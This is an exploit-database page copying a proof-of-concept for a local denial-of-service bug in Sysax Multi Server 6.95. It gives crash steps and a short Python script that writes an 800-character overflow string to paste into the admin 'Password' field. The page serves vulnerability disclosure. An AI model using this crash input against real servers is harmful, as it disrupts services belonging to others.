Advertisement






Sysax Multi Server 6.95 Password Denial of Service (PoC)

CVE Category Price Severity
N/A CWE-xxx N/A Unknown
Author Risk Exploitation Type Date
Unknown Unknown Remote 2023-03-27
CPE
cpe:cpe:/a:sysax:multi_server:6.95
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023030054

Below is a copy:

Sysax Multi Server 6.95 Password Denial of Service (PoC)
# Exploit Title: Sysax Multi Server 6.95 - 'Password' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2022-10-05
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download/sysaxserv_setup.msi
# Tested Version: 6.95
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es

# Steps to Produce the Crash:
# 1.- Run python code: Sysax_Multi_Server_6.95.py
# 2.- Open Sysax_Multi_Server_6.95.txt and copy content to clipboard
# 3.- Open "Sysax Multi Server"
# 4.- Manage Server Settings...
# 5.- Administrative Settings -> Configure...
# 6.- Clic "Enable web based administration and API access"
# 7.- Login -> admin
# 8.- Paste ClipBoard on "Password"
# 9.- Save
# 10.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 800
f = open ("Sysax_Multi_Server_6.95.txt", "w")
f.write(buffer)
f.close()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum